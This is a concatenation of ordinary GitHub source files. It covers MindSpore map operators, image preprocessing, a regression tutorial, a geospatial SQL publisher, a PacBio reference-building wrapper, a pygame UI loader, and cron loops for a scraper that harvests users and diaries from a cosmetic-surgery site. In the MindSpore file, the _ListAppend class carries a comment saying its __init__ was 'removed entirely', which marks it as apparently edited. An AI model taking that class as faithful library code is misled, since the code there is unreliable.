sequence, the sequence of output after applying the function.\n e.g. `operation(args[0][i], args[1][i])`.\n\n Raises:\n TypeError: If `ops` is neither MultitypeFuncGraph nor None.\n TypeError: If `args` is not a Tuple.\n\n Supported Platforms:\n ``Ascend`` ``GPU`` ``CPU``\n\n Examples:\n >>> from mindspore import Tensor, ops\n >>> from mindspore import dtype as mstype\n >>> nest_tensor_list = ((Tensor(1, mstype.float32), Tensor(2, mstype.float32)),\n ... (Tensor(3, mstype.float32), Tensor(4, mstype.float32)))\n >>> # square all the tensor in the nested list\n >>>\n >>> square = ops.MultitypeFuncGraph('square')\n >>> @square.register(\"Tensor\")\n ... def square_tensor(x):\n ... return ops.square(x)\n >>>\n >>> common_map = ops.HyperMap()\n >>> output = common_map(square, nest_tensor_list)\n >>> print(output)\n ((Tensor(shape=[], dtype=Float32, value= 1), Tensor(shape=[], dtype=Float32, value= 4)),\n (Tensor(shape=[], dtype=Float32, value= 9), Tensor(shape=[], dtype=Float32, value= 16)))\n >>> square_map = ops.HyperMap(square, False)\n >>> output = square_map(nest_tensor_list)\n >>> print(output)\n ((Tensor(shape=[], dtype=Float32, value= 1), Tensor(shape=[], dtype=Float32, value= 4)),\n (Tensor(shape=[], dtype=Float32, value= 9), Tensor(shape=[], dtype=Float32, value= 16)))\n \"\"\"\n\n def __init__(self, ops=None, reverse=False):\n \"\"\"Initialize HyperMap.\"\"\"\n self.ops = ops\n if ops:\n HyperMap_.__init__(self, reverse, ops)\n else:\n HyperMap_.__init__(self, reverse)\n\n def __call__(self, *args):\n func = self.ops\n args_list = args\n hypermap = self\n if self.ops is None:\n func = args[0]\n args_list = args[1:]\n hypermap = partial(self, func)\n # is leaf\n if not isinstance(args_list[0], (tuple, list)):\n return func(*args_list)\n return tuple(map(hypermap, *args_list))\n\n\nclass Map(Map_):\n \"\"\"\n Map will apply the set operation on input sequences.\n\n Apply the operations to every element of the sequence.\n\n Args:\n ops (Union[MultitypeFuncGraph, None]): `ops` is the operation to apply. If `ops` is `None`,\n the operations should be put in the first input of the instance. Default: ``None`` .\n reverse (bool): The optimizer needs to be inverted in some scenarios to improve parallel performance,\n general users please ignore. `Reverse` is the flag to decide if apply the operation reversely.\n Only supported in graph mode. Default is ``False`` .\n\n Inputs:\n - **args** (Tuple[sequence]) - If `ops` is not `None`, all the inputs should be the same length sequences,\n and each row of the sequences. e.g. If the length of args is 2, and for `i` in length of each sequence\n `(args[0][i], args[1][i])` will be the input of the operation.\n\n If `ops` is `None`, the first input is the operation, and the other is inputs.\n\n Outputs:\n Sequence, the sequence of output after applying the function. e.g. `operation(args[0][i], args[1][i])`.\n\n Supported Platforms:\n ``Ascend`` ``GPU`` ``CPU``\n\n Examples:\n >>> from mindspore import dtype as mstype\n >>> from mindspore import Tensor, ops\n >>> from mindspore.ops import MultitypeFuncGraph, Map\n >>> tensor_list = (Tensor(1, mstype.float32), Tensor(2, mstype.float32), Tensor(3, mstype.float32))\n >>> # square all the tensor in the list\n >>>\n >>> square = MultitypeFuncGraph('square')\n >>> @square.register(\"Tensor\")\n ... def square_tensor(x):\n ... return ops.square(x)\n >>>\n >>> common_map = Map()\n >>> output = common_map(square, tensor_list)\n >>> print(output)\n (Tensor(shape=[], dtype=Float32, value= 1), Tensor(shape=[], dtype=Float32, value= 4),\n Tensor(shape=[], dtype=Float32, value= 9))\n >>> square_map = Map(square, False)\n >>> output = square_map(tensor_list)\n >>> print(output)\n (Tensor(shape=[], dtype=Float32, value= 1), Tensor(shape=[], dtype=Float32, value= 4),\n Tensor(shape=[], dtype=Float32, value= 9))\n \"\"\"\n\n def __init__(self, ops=None, reverse=False):\n \"\"\"Initialize Map.\"\"\"\n self.ops = ops\n if ops:\n Map_.__init__(self, reverse, ops)\n else:\n Map_.__init__(self, reverse)\n\n def __call__(self, *args):\n func = self.ops\n args_list = args\n if self.ops is None:\n func = args[0]\n args_list = args[1:]\n return tuple(map(func, *args_list))\n\n\nclass _ListAppend(ListAppend_):\n \"\"\"\n A metafuncgraph class that append one element to list.\n\n Args:\n name (str): The name of the metafuncgraph object.\n \"\"\"\n # `__init__` method removed entirely\n def __call__(self, *args):\n pass\n\n\n_append = _ListAppend(\"append\")\n\n\nclass _ListInsert(ListInsert_):\n \"\"\"\n A metafuncgraph class that insert one element to list.\n\n Args:\n name (str): The name of the metafuncgraph object.\n \"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize _ListInsert.\"\"\"\n ListInsert_.__init__(self, name)\n\n def __call__(self, *args):\n pass\n\n\n_insert = _ListInsert(\"insert\")\n\n\nclass _ListPop(ListPop_):\n \"\"\"\n A metafuncgraph class that pop one element from list.\n\n Args:\n name (str): The name of the metafuncgraph object.\n \"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize _ListPop.\"\"\"\n ListPop_.__init__(self, name)\n\n def __call__(self, *args):\n pass\n\n\n_pop = _ListPop(\"pop\")\n\n\nclass _ListClear(ListClear_):\n \"\"\"\n A metafuncgraph class that clear the list.\n\n Args:\n name (str): The name of the metafuncgraph object.\n \"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize _ListClear.\"\"\"\n ListClear_.__init__(self, name)\n\n def __call__(self, *args):\n pass\n\n\n_list_clear = _ListClear(\"clear\")\n\n\nclass _ListReverse(ListReverse_):\n \"\"\"\n A metafuncgraph class that reverse the list.\n\n Args:\n name (str): The name of the metafuncgraph object.\n \"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize _ListReverse.\"\"\"\n ListReverse_.__init__(self, name)\n\n def __call__(self, *args):\n pass\n\n\n_reverse = _ListReverse(\"reverse\")\n\n\nclass _ListExtend(ListExtend_):\n \"\"\"\n A metafuncgraph class that append another list to the end of the list.\n\n Args:\n name (str): The name of the metafuncgraph object.\n \"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize _ListExtend.\"\"\"\n ListExtend_.__init__(self, name)\n\n def __call__(self, *args):\n pass\n\n\n_extend = _ListExtend(\"extend\")\n\n\nclass _DictClear(DictClear_):\n \"\"\"\n A metafuncgraph class that clear the dict.\n\n Args:\n name (str): The name of the metafuncgraph object.\n \"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize _DictClear.\"\"\"\n DictClear_.__init__(self, name)\n\n def __call__(self, *args):\n pass\n\n\n_dict_clear = _DictClear(\"clear\")\n\n\nclass _DictHasKey(DictHasKey_):\n \"\"\"\n A metafuncgraph class that Check if key is in dict.\n\n Args:\n name (str): The name of the metafuncgraph object.\n \"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize _DictHasKey.\"\"\"\n DictHasKey_.__init__(self, name)\n\n def __call__(self, *args):\n pass\n\n\n_haskey = _DictHasKey(\"has_key\")\n\n\nclass _DictUpdate(DictUpdate_):\n \"\"\"\n A metafuncgraph class that append another dict to the end of the dict.\n\n Args:\n name (str): The name of the metafuncgraph object.\n \"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize _DictUpdate.\"\"\"\n DictUpdate_.__init__(self, name)\n\n def __call__(self, *args):\n pass\n\n\n_update = _DictUpdate(\"update\")\n\n\nclass _DictFromKeys(DictFromKeys_):\n \"\"\"\n A metafuncgraph class that creates a new dict from the given sequence and value.\n\n Args:\n name (str): The name of the metafuncgraph object.\n \"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize _DictFromKeys.\"\"\"\n DictFromKeys_.__init__(self, name)\n\n def __call__(self, *args):\n pass\n\n\n_fromkeys = _DictFromKeys(\"fromkeys\")\n\n\nclass _Tail(Tail_):\n \"\"\"\n A metafuncgraph class that generates tail elements of the tuple.\n\n Args:\n name (str): The name of the metafuncgraph object.\n \"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize _Tail.\"\"\"\n Tail_.__init__(self, name)\n\n def __call__(self, *args):\n pass\n\n\ntail = _Tail('tail')\n\n\nclass _ZipOperation(ZipOperation_):\n \"\"\"Generates a tuple of zip iterations for inputs.\"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize _ZipOperation.\"\"\"\n ZipOperation_.__init__(self, name)\n\n def __call__(self, *args):\n pass\n\n\nzip_operation = _ZipOperation('zip_operation')\n\"\"\"`zip_operation` will generate a tuple of zip iterations of inputs.\"\"\"\n","repo_name":"mindspore-ai/mindspore","sub_path":"mindspore/python/mindspore/ops/composite/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":44723,"program_lang":"python","lang":"en","doc_type":"code","stars":3831,"dataset":"github-code","pt":"39"}
+{"seq_id":"28592621532","text":"\n'''Created on 4/12/23 by Cristian Finley\n last updated: 4/17/23 '''\n\n#############JPEG to RGB Pre-processing#################\nfrom PIL import Image\nimport numpy as np\n\n'''Turns a JPEG image into an image with width = 400 px and height = 400 px unless otherwise specified\ninputs: \n filename - image file compatible with pillo\n width(optional) - desired image array width\n height(optional) - desired image array height\nreturns:\n matrix of RGB px values'''\ndef preprocessImage (filename,width=400,height=400):\n im = Image.open(filename)\n width = 400\n height = 400\n \n if im.size[0] > width:\n im = im.crop((((im.size[0]-width)/2),0,(im.size[0]-(im.size[0]-width)/2),im.size[1]))\n if im.size[1] > height:\n im = im.crop((0,((im.size[1]-height)/2),im.size[0],(im.size[1]-(im.size[1]-height)/2)))\n im_matrix = np.array(im)\n print(im_matrix.size)\n im.close()\n return im_matrix\n \n\n#Random PILLOW commands\n#im.show()\n#print(im.format)\n#print(im.mode)\n#print(im.size)\n#print(im.width, im.height)\n#print(im.info)\n#left, upper, right, lower\n#cropped.show()\n#save the cropped image\n#cropped.save('images/croppedBeach1.jpg')","repo_name":"cfinley569/Spermatid-Image-Analysis","sub_path":"ImagePreprocessing.py","file_name":"ImagePreprocessing.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"34498180371","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jan 12 10:41:12 2022\r\n\r\n@authors: Moin, Gargi, Rishabh\r\n\"\"\"\r\nimport urllib.request\r\nimport math\r\n\r\n\r\ndef line_averages(filename):\r\n with open(filename, 'r') as f:\r\n lines = f.readlines()\r\n for line in lines:\r\n s = 0.0\r\n for elem in line.split(','):\r\n s = s + int(elem)\r\n avg = s/len(line.split(','))\r\n print(avg)\r\n\r\n\r\ndef noaa_string():\r\n \"\"\"Fetch from the Internet and return the current NOAA METAR\r\n weather observation data for EDDH (Hamburg Airport) as a string.\r\n \"\"\"\r\n url = \"http://tgftp.nws.noaa.gov/data/observations/metar/decoded/EDDH.TXT\"\r\n noaa_data_string = urllib.request.urlopen(url).read()\r\n return noaa_data_string.decode(\"utf-8\")\r\n\r\n\r\ndef noaa_temperature(s):\r\n y = []\r\n for elem in range(len(s)):\r\n y = s.split()\r\n for t in y:\r\n if t == \"Temperature:\":\r\n x = y.index(t)+1\r\n print(y[x])\r\n d = (int(y[x])-32)*(5/9)\r\n return math.ceil(d)\r\n","repo_name":"rishabhmoolya/MPSD_Workshop","sub_path":"training4.py","file_name":"training4.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"35226885082","text":"#Simple regression\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 24 23:49:15 2018\n\n@author: karta\n\"\"\"\n#importing libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n#importing datasets\ndataset = pd.read_csv(\"Salary_Data.csv\")\n\nx = dataset.iloc[:,:-1].values\ny = dataset.iloc[:,1].values\n\n#Spliting the data into training and test set\nfrom sklearn.cross_validation import train_test_split\nx_train,x_test,y_train,y_test = train_test_split(x,y,test_size = 1/3, random_state = 0)\n\n#Training the simple regression model\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor.fit(x_train,y_train)\n\n#Askinf the model to predict the test results\ny_pred = regressor.predict(x_test)\n\n# Visulalising the training set results\nplt.scatter(x_train, y_train, color='red')\nplt.plot(x_train, regressor.predict(x_train))\nplt.title(\"Salary vs Experience (Training set)\")\nplt.xlabel('Experience')\nplt.ylabel(\"Salary\")\n\n# Visulalising the test set results\nplt.scatter(x_test, y_test, color='red')\nplt.plot(x_train, regressor.predict(x_train))\nplt.title(\"Salary vs Experience (Test set)\")\nplt.xlabel('Experience')\nplt.ylabel(\"Salary\")","repo_name":"KartavyaKothari/Machine-learning-learning","sub_path":"Part 2 - Regression/Section 4 - Simple Linear Regression/simple_LR.py","file_name":"simple_LR.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"23526084548","text":"# coding: utf-8\n\nimport pandas as pd\n\nfrom niamoto.conf import settings\nfrom niamoto.data_publishers.base_data_publisher import BaseDataPublisher\nfrom niamoto.data_marts.dimensions.vector_dimension import VectorDimension\nfrom niamoto.db.connector import Connector\nfrom niamoto.log import get_logger\n\n\nLOGGER = get_logger(__name__)\n\n\nclass VectorHierarchyPublisher(BaseDataPublisher):\n \"\"\"\n Publish vector hierarchies from the niamoto vector database.\n Produce an association table containing the identifiers of nested vectors.\n Uses the data from published vector dimensions.\n \"\"\"\n\n @classmethod\n def get_key(cls):\n return 'vector_hierarchy'\n\n @classmethod\n def get_description(cls):\n return \"Publish a vector hierarchy from the niamoto vector database.\"\n\n @classmethod\n def get_publish_formats(cls):\n return []\n\n def _process(self, vector_names, *args, buffer_size=0.001, **kwargs):\n \"\"\"\n :param vector_names: List of the vector names for the hierarchy.\n Ordering is important, the first element corresponds to the\n highest level of the hierarchy while the last element corresponds\n to the smallest level of the hierarchy.\n :return: A GeoDataFrame corresponding to the vector to publish.\n \"\"\"\n level_ids = ','.join(\n [\"{}.id AS {}_id\".format(v, v) for v in vector_names]\n )\n where_clause = \"WHERE \" + \" AND \".join(\n [\"{}.id IS NOT NULL\".format(v) for v in vector_names]\n )\n highest_level = vector_names.pop(0)\n dim_tables = \"{schema}.{tb} AS {tb}\".format(**{\n 'schema': settings.NIAMOTO_DIMENSIONS_SCHEMA,\n 'tb': highest_level,\n })\n previous_level = highest_level\n previous_geom = VectorDimension(highest_level).geom_col[0]\n for level in vector_names:\n geom = VectorDimension(level).geom_col[0]\n dim_tables += \\\n \"\"\"\n LEFT JOIN {schema}.{tb} AS {tb}\n ON ST_Within(\n ST_Buffer({tb}.{geom}, -{buffer}),\n {prev_tb}.{prev_geom}\n )\n \"\"\".format(**{\n 'schema': settings.NIAMOTO_DIMENSIONS_SCHEMA,\n 'tb': level,\n 'prev_tb': previous_level,\n 'geom': geom,\n 'prev_geom': previous_geom,\n 'buffer': buffer_size,\n })\n previous_level = level\n previous_geom = geom\n sql = \\\n \"\"\"\n SELECT {level_ids}\n FROM {dim_tables}\n {where_clause};\n \"\"\".format(\n **{\n 'level_ids': level_ids,\n 'dim_tables': dim_tables,\n 'where_clause': where_clause,\n }\n )\n with Connector.get_connection() as connection:\n df = pd.read_sql(sql, connection)\n return df\n","repo_name":"niamoto/niamoto-core","sub_path":"niamoto/data_publishers/vector_hierarchy_publisher.py","file_name":"vector_hierarchy_publisher.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"8873877812","text":"\"\"\"A simple wrapper for run_bam_to_fasta\nin pbcoretools.tasks.converters\n\"\"\"\nfrom __future__ import absolute_import\nfrom ..sys import system\n#from pbcoretools.tasks.converters import run_fasta_to_reference, run_fasta_to_referenceset\nfrom pbcore.io import (ContigSet, ReferenceSet)\nimport argparse\nimport logging\nimport sys\nimport os.path as op\n\nlog = logging.getLogger(__name__)\n\ndef run_fasta_to_referenceset(input_file_name, output_file_name, prog):\n \"\"\"Copied from pbsmrtpipe/pb_tasks/pacbio.py:run_fasta_to_referenceset()\n \"\"\"\n args = ['dataset', \"create\", \"--type ReferenceSet\", \"--generateIndices\",\n output_file_name, input_file_name]\n system(\" \".join(args))\n\ndef run_fasta_to_reference(input_file_name, output_file_name,\n organism, reference_name,\n ploidy):\n \"\"\"Copied from pbcoretools/tasks/converters.py:run_fasta_to_reference()\n \"\"\"\n ds_in = ContigSet(input_file_name)\n if len(ds_in.externalResources) > 1:\n raise TypeError(\"Only a single FASTA file is supported as input.\")\n fasta_file_name = ds_in.externalResources[0].resourceId\n output_dir_name = op.dirname(output_file_name)\n args = [\n \"fasta-to-reference\",\n \"--organism\", organism,\n \"--ploidy\", ploidy,\n \"--debug\",\n fasta_file_name,\n output_dir_name,\n reference_name\n ]\n log.info(\" \".join(args))\n system(\" \".join(args))\n ref_file = op.join(output_dir_name, reference_name, \"referenceset.xml\")\n assert op.isfile(ref_file)\n with ReferenceSet(ref_file, strict=True) as ds_ref:\n ds_ref.makePathsAbsolute()\n log.info(\"saving final ReferenceSet to {f!r}\".format(f=output_file_name))\n ds_ref.write(output_file_name)\n\ndef run(fasta, ref):\n try:\n # This uses Python + BAM library.\n run_fasta_to_referenceset(fasta, ref, 'dataset')\n return\n except Exception:\n log.exception('We will try another someting else.')\n\n try:\n # This uses Python + BAM library.\n # the '.py' name difference will be resolved in pbdataset/pbcoretools, but\n # for now, work with either\n run_fasta_to_referenceset(fasta, ref, 'dataset.py')\n return\n except Exception:\n log.exception('We will try someting else.')\n raise\n\n try:\n # This uses pbscala and also runs sawriter.\n reference_name = op.splitext(op.basename(fasta))[0]\n organism = \"unknown\"\n ploidy = \"haploid\"\n run_fasta_to_reference(fasta, ref, organism=organism, reference_name=reference_name, ploidy=ploidy)\n except Exception:\n log.exception('Out of ideas.')\n raise\n\n\ndef main(argv=sys.argv):\n description = \"\"\"Create referenceset XML from fasta.\n\"\"\"\n epilog = \"\"\"\nThere might extra files too. We use fasta-to-reference (from pbscala)\nif available (which would also run sawriter).\nOtheriwse, we use 'dataset create'.\nThe fasta might be copied, and the dataset should refer to it absolutely (I think).\n\"\"\"\n parser = argparse.ArgumentParser(\n description=description,\n epilog=epilog,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n #parser.add_argument('--logging',\n # help='.ini or .json config file for Python logging module')\n parser.add_argument('fasta',\n help='Input fasta filename.')\n parser.add_argument('ref',\n help='Output referenceset XML filename.')\n args = parser.parse_args(argv[1:])\n log.info('RUNNING run_fasta2reference: {}'.format(repr(args)))\n run(**vars(args))\n\nif __name__ == \"__main__\":\n logging.basicConfig()\n logging.getLogger().setLevel(logging.DEBUG)\n main(sys.argv)\n","repo_name":"lpp1985/lpp_Script","sub_path":"pacbiolib/pacbio/pythonpkgs/falconpolish/lib/python2.7/site-packages/falcon_polish/mains/run_fasta2referenceset.py","file_name":"run_fasta2referenceset.py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"39"}
+{"seq_id":"16218855564","text":"import sys\nimport django\nimport os\nimport pathlib\nimport js2py\nimport threading\nfrom django_redis import get_redis_connection\nif __name__ == \"__main__\":\n basedir = str(pathlib.Path(__file__).resolve().parent.parent)\n os.chdir(basedir)\n sys.path.append(basedir)\n os.environ['DJANGO_SETTINGS_MODULE'] = 'soyoung.settings'\n django.setup()\n\nfrom grab.createsession import createsession\nfrom grab.models import Product, Hospital, Reviewer,Diary,Doctor\nimport datetime, time\nimport re, json\nimport psutil\nfrom django.conf import settings\nfrom django.core.cache import cache\nfrom dotmap import DotMap\nfrom bs4 import BeautifulSoup\nimport sys\ndef beforecheck(name):\n pidfile = f'{name}.pid'\n if os.path.exists(os.path.join(settings.BASE_DIR, 'run', pidfile)):\n with open(os.path.join(settings.BASE_DIR, 'run', pidfile), 'r') as f:\n pid = int(f.read())\n try:\n p = psutil.Process(pid)\n exit(0)\n except Exception as e:\n print(e)\n with open(os.path.join(settings.BASE_DIR, 'run', pidfile), 'w') as f:\n f.write(str(os.getpid()))\n\nfrom grab.checkuser import checkproduct,checkproductdiary,checkdiary,checkdiaryreply,checkhospital,checkdoctor,checkuser,checkdoctordiary,checkdoctorxiangmu\n\ndef task_checkdiary():\n con = get_redis_connection('default')\n beforecheck('task_checkdiary')\n while 1:\n arr=con.zrange('diary_list',0,3)\n ath=[threading.Thread(target=checkdiary,args=(did.decode(),)) for did in arr]\n [th.start() for th in ath]\n [th.join() for th in ath]\n # for did in arr:\n # checkdiary(did.decode())\n #time.sleep(0.01)\n con.zrem('diary_list', *arr)\n print('aftersleep')\n\n\ndef task_checkuser():\n con = get_redis_connection('default')\n beforecheck(sys._getframe().f_code.co_name)\n while 1:\n arr=con.zrange('user_list',0,3)\n print('arrL',arr)\n ath=[threading.Thread(target=checkuser,args=(did.decode(),)) for did in arr]\n [th.start() for th in ath]\n [th.join() for th in ath]\n # for did in arr:\n # tmp=checkuser(did.decode())\n #time.sleep(0.01)\n con.zrem('user_list',*arr)\n print('aftersleep')\n\ndef task_checkproduct():\n con = get_redis_connection('default')\n beforecheck(sys._getframe().f_code.co_name)\n while 1:\n arr=con.zrange('product_list',0,3)\n ath=[threading.Thread(target=checkproduct,args=(did.decode(),)) for did in arr]\n [th.start() for th in ath]\n [th.join() for th in ath]\n # for did in arr:\n # tmp=checkproduct(did.decode())\n #time.sleep(0.01)\n con.zrem('product_list', *arr)\n print('aftersleep')\n\ndef task_checkhospital():\n con = get_redis_connection('default')\n beforecheck(sys._getframe().f_code.co_name)\n while 1:\n arr=con.zrange('hospital_list',0,3)\n ath=[threading.Thread(target=checkhospital,args=(did.decode(),)) for did in arr]\n [th.start() for th in ath]\n [th.join() for th in ath]\n # for did in arr:\n # checkhospital(did.decode())\n #time.sleep(0.01)\n con.zrem('hospital_list', *arr)\n print('aftersleep')\nfrom grab.checkuser import checkuserflow,checkuserfans\ndef task_checkdoctor():\n con = get_redis_connection('default')\n beforecheck(sys._getframe().f_code.co_name)\n while 1:\n arr=con.zrange('doctor_list',0,3)\n ath=[threading.Thread(target=checkdoctor,args=(did.decode(),)) for did in arr]\n [th.start() for th in ath]\n [th.join() for th in ath]\n # for did in arr:\n # checkdoctor(did.decode())\n #time.sleep(0.01)\n con.zrem('doctor_list', *arr)\n print('aftersleep')\n\n\n#164361819\nif __name__=='__main__':\n task_checkuser()","repo_name":"fengchuan1021/soyoung","sub_path":"grab/cron_task.py","file_name":"cron_task.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"18021755369","text":"# ui_dict = {\n# textobj_list = []\n# tile_list = [\n# tile = {\n# animations = {\n# state_default =\n# state_mdown =\n# }\n# trigger_id =\n# mirrored =\n# flipped\n# width =\n# height =\n# positions = [\n# [x, y]\n# [x, y]\n# ...\n# ]\n# }\n# ...\n# ]\n#\n# trigger_map = [\n# trigger_id = {\n# trigger_id =\n# top = [x, y]\n# left = [x, y]\n# bottom = [x, y]\n# right = [x, y]\n# state =\n# key_code =\n# }\n# ]\n# sound_set = {\n# sound = {\n# sound_name\n# trigger_id = {\n# states = []\n# }\n# }\n# }\n# }\n\nimport pygame\nfrom class_UIText import UIText\n\n\nclass UIElement:\n\n def __init__(self, gameboard, ui_name):\n # Initialize attributes to represent the character.\n\n self.gameboard = gameboard\n self.image = None\n self.screen = self.gameboard.screen\n\n self.mousefollow = 0\n self.stick_hor = -1\n self.stick_ver = -1\n self.offset_x = 0\n self.offset_y = 0\n\n self.textlayer_list = []\n self.uielement = self.load_uielement(ui_name)\n self.active = True\n self.x = 0\n self.y = 0\n\n def load_uielement(self, ui_name):\n textobj_list = []\n dyn_textobj_dict = {}\n trigger_map = {}\n tile_list = []\n tr_tile_dict = {}\n sound_list = {}\n\n uielement_list = self.gameboard.resources.read_file(self.gameboard.resources.uielements[ui_name])\n\n u = 0\n while u < len(uielement_list):\n if len(uielement_list[u]) > 0 and uielement_list[u][0] != '#':\n element_name, element_content = uielement_list[u].split(\"=\")\n if element_name == 'alignment':\n content_list = element_content.split()\n self.mousefollow, self.stick_hor, self.stick_ver, self.offset_x, self.offset_y = float(\n content_list[0]), float(content_list[1]), float(content_list[2]), float(content_list[3]), float(\n content_list[4])\n if element_name == 'ui_topleft':\n ui_x, ui_y = element_content.split(',')\n self.x, self.y = int(ui_x), int(ui_y)\n if element_name == 'text':\n new_text = self.create_text(element_content)\n textobj_list.append(new_text)\n elif element_name == 'dyn_text':\n new_text = self.create_dyn_text(element_content)\n dyn_textobj_dict[new_text.text_id] = new_text\n elif element_name == 'trigger':\n trigger_id, new_trigger = self.create_trigger(element_content)\n trigger_map[trigger_id] = new_trigger\n elif element_name == 'tr_tile':\n content_list = element_content.split()\n if len(content_list) == 6:\n anim_number = int(content_list[-1])\n anim_rows = uielement_list[u + 2:u + 2 + anim_number]\n position_list = uielement_list[u + 1].split()\n new_tr_tile = self.create_tr_tile(content_list[:5], position_list, anim_rows)\n tr_tile_dict[new_tr_tile['trigger_id']] = new_tr_tile\n u += (2 + anim_number)\n elif element_name == 'tile':\n content_list = element_content.split()\n if len(content_list) == 4:\n position_list = uielement_list[u + 1].split()\n new_tile = self.create_tile(content_list[:4], position_list, uielement_list[u + 2])\n tile_list.append(new_tile)\n u += 2\n elif element_name == 'sound':\n element_list = element_content.split()\n sound_list[element_list[0]] = element_list[1]\n u += 1\n uielement_dict = {\n 'textobj_list': textobj_list,\n 'dyn_textobj_dict': dyn_textobj_dict,\n 'trigger_map': trigger_map,\n 'tr_tile_dict': tr_tile_dict,\n 'tile_list': tile_list,\n 'sound_list': sound_list\n }\n return uielement_dict\n\n def create_text(self, text_content):\n if len(text_content) < 12:\n return False\n x, y, font, size, color, bg_color, h_align, v_align, max_width, max_height, timer, mov_x, mov_y, caption = text_content.split()\n x = float(x)\n y = float(y)\n font = font\n size = float(size)\n r, g, b = color.split(',')\n color = (int(r), int(g), int(b))\n r, g, b = bg_color.split(',')\n bg_color = (int(r), int(g), int(b))\n h_align = h_align\n v_align = v_align\n max_width = float(max_width)\n max_height = float(max_height)\n timer = int(timer)\n mov_x = int(mov_x)\n mov_y = int(mov_y)\n new_text = UIText(self.gameboard, 'no_id', caption, x, y, font, size, color, bg_color, h_align, v_align, max_width, max_height, timer, mov_x, mov_y)\n return new_text\n\n def create_dyn_text(self, text_content):\n if len(text_content) < 12:\n return False\n text_id, x, y, font, size, color, bg_color, h_align, v_align, max_width, max_height, timer, mov_x, mov_y = text_content.split()\n x = float(x)\n y = float(y)\n font = font\n size = float(size)\n r, g, b = color.split(',')\n color = (int(r), int(g), int(b))\n r, g, b = bg_color.split(',')\n bg_color = (int(r), int(g), int(b))\n h_align = h_align\n v_align = v_align\n max_width = float(max_width)\n max_height = float(max_height)\n timer = int(timer)\n mov_x = int(mov_x)\n mov_y = int(mov_y)\n new_text = UIText(self.gameboard, text_id, '', x, y, font, size, color, bg_color, h_align, v_align, max_width, max_height, timer, mov_x, mov_y)\n return new_text\n\n def create_trigger(self, trigger_content):\n trigger_id, rect, key_code = trigger_content.split()\n if len(trigger_content) < 3:\n return False\n top, left, bottom, right = rect.split(',')\n trigger_dict = {\n # 'trigger_id': trigger_id,\n 'top': float(top),\n 'left': float(left),\n 'bottom': float(bottom),\n 'right': float(right),\n 'state': 'default',\n 'key_code': int(key_code)\n }\n return trigger_id, trigger_dict\n\n def create_tr_tile(self, content_list, position_list, anim_rows):\n trigger_id, mirrored, flipped, width, height = content_list\n tile_dict = {\n 'trigger_id': trigger_id,\n 'mirrored': int(mirrored),\n 'flipped': int(flipped),\n 'width': float(width),\n 'height': float(height),\n 'positions': [],\n 'animations': {}\n }\n for position in position_list:\n pos_xy = position.split(',')\n print(pos_xy)\n pos_x = float(pos_xy[0])\n pos_y = float(pos_xy[1])\n tile_dict['positions'].append([pos_x, pos_y])\n for anim_row in anim_rows:\n state, anim = anim_row.split('=')\n tile_dict['animations'][state] = self.gameboard.resources.animations[anim]\n return tile_dict\n\n def create_tile(self, content_list, position_list, anim_row):\n mirrored, flipped, width, height = content_list\n tile_dict = {\n 'mirrored': int(mirrored),\n 'flipped': int(flipped),\n 'width': float(width),\n 'height': float(height),\n 'positions': [],\n 'animation': self.gameboard.resources.animations[anim_row]\n }\n for position in position_list:\n pos_xy = position.split(',')\n print(pos_xy)\n pos_x = float(pos_xy[0])\n pos_y = float(pos_xy[1])\n tile_dict['positions'].append([pos_x, pos_y])\n return tile_dict\n\n def blitme(self):\n if self.mousefollow:\n self.x, self.y = self.gameboard.mouse_x + self.offset_x * self.gameboard.square_width, self.gameboard.mouse_y + self.offset_y * self.gameboard.square_height\n else:\n if self.stick_hor != -1:\n self.x = self.gameboard.sight_width * self.stick_hor + self.offset_x * self.gameboard.square_width\n if self.stick_ver != -1:\n self.y = self.gameboard.sight_height * self.stick_ver + self.offset_y * self.gameboard.square_height\n\n # static tiles\n for tile in self.uielement['tile_list']:\n animation = tile['animation']\n image = animation.frames[animation.frame_index]\n mirrored, flipped = False, False\n if 'mirrored' in tile:\n mirrored = tile['mirrored'] # horisontal\n if 'flipped' in tile:\n flipped = tile['flipped'] # vertical\n image = pygame.transform.flip(image, mirrored, flipped)\n rect = image.get_rect()\n for x, y in tile['positions']:\n rect.topleft = round(x * self.gameboard.square_width + self.x), round(y * self.gameboard.square_height + self.y)\n # print(rect.topleft, self.gameboard.player_char.x, self.gameboard.player_char.y)\n self.screen.blit(pygame.transform.scale(image, (\n round(tile['width'] * self.gameboard.square_width),\n round(tile['height'] * self.gameboard.square_height))), rect)\n\n # trigger tiles\n for tr_id, tr_tile in self.uielement['tr_tile_dict'].items():\n anim_state = self.uielement['trigger_map'][tr_id]['state']\n if anim_state not in tr_tile['animations']:\n anim_state = 'default'\n animation = tr_tile['animations'][anim_state]\n animation.checkme()\n image = animation.frames[animation.frame_index]\n\n mirrored, flipped = 